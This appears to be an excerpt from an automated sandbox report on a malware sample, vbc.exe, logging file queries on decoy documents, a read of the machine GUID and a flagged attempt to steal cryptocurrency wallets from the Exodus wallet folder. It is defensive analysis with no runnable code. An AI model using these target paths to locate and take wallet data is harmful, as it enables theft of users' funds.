Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\CURQNKVOIX.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\CURQNKVOIX.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\DVWHKMNFNN.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\DVWHKMNFNN.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\JSDNGYCOWY.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\JSDNGYCOWY.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\JSDNGYCOWY.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\JSDNGYCOWY.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\LTKMYBSEYZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\LTKMYBSEYZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NIKHQAIQAU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NIKHQAIQAU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NWTVCDUMOB.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NWTVCDUMOB.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NWTVCDUMOB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NWTVCDUMOB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\WUTJSCBCFX.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\WUTJSCBCFX.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\YPSIACHYXW.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\YPSIACHYXW.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\YPSIACHYXW.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\YPSIACHYXW.xlsx VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to steal Crypto Currency Wallets

Source: C:\Users\Public\vbc.exe

File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\